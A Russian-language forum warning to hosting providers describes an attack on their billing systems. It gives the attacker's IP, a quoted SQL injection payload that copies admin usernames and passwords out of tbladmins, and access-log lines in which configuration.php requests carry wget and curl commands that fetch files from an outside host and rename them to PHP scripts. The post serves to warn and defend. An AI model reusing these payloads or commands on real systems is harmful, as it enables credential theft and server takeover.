Хостинг Хостерам тимспик

Коллеги уведомляю вас, появился нехороший человек осуществляющий взлом биллинговых систем
IP адрес злоумышленника
167.114.157.33
методы взлома: попытка инжекта:
Client Profile Modified - Company Name: ' BN-Family ' to ' BN-IDB ', Address 1: 'dm' to 'AES_ENCRYPT(1,1), address1= (SELECT MIN(username) FROM tbladmins)', Address 2: 'dm' to 'AES_ENCRYPT(1,1), address2= (SELECT MIN(password) FROM tbladmins)', Postcode: '404403' to 'dm', Default Payment Method: '' to ''

так же попытки залить свой скрипт к вам на хостинг с адреса
http://azzatssins.yu.tl/*******
для этого использует следующий метод:
167.114.157.33 - - [18/Jul/2015:12:35:13 +0300] "GET /configuration.php?x=wget%20-c%20www.azzatssins.yu.tl/***s.zip HTTP/1.1" 200 -
167.114.157.33 - - [18/Jul/2015:12:35:14 +0300] "GET /configuration.php?x=mv%20c****s.zip%***s.php HTTP/1.1" 200 -
167.114.157.33 - - [18/Jul/2015:12:35:14 +0300] "GET /configuration.php?x=curl%20-O%20www.azzatssins.yu.tl/f****ip.zip HTTP/1.1" 200 -
167.114.157.33 - - [18/Jul/2015:12:35:14 +0300] "GET /configuration.php?x=mv%2*rs.zip.zip%2*NS.php HTTP/1.1" 200 -
167.114.157.33 - - [18/Jul/2015:12:35:15 +0300] "GET /configuration.php?x=mv%*ns.zip%20*ers.php HTTP/1.1" 200 -

я стянул с его хоста тот код который он пытается залить и проанализировал его, суть в том что он сливает всю sql базу

предупрежден значит вооружен!
В моем случае человеку ничего не удалось , надеюсь вы так же успеете принять меры дабы не стать жертвой злоумышленника.

 

Ваша биллинговая система самописная или приобретенная?

 

Приобретенная, багрепорт разработчикам отправлен.